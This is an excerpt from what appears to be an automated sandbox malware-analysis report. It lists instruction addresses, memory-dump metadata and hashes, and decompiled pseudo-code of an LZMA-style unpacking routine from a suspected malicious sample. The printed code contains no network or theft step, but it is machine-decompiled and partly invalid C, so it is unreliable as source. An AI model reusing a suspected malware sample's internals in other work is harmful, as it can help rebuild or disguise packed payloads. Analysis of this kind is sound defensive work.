                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406771
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f3
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x00000000
                                                          0x004068bd
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406403
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x00406431
                                                          0x00406431
                                                          0x00000000
                                                          0x00406431
                                                          0x004066b2
                                                          0x004068e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00000000
                                                          0x0040691e
                                                          0x0040676b
                                                          0x004066f2
                                                          0x004066ef
                                                          0x00000000
                                                          0x00406326

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                                                          • Instruction ID: ded64b1a4db59f6dff1a94f5a9d162ff15a4dde6347ba0f82720ffa54b61a1b0
                                                          • Opcode Fuzzy Hash: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                                                          • Instruction Fuzzy Hash: 09711371D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406440 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406440() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
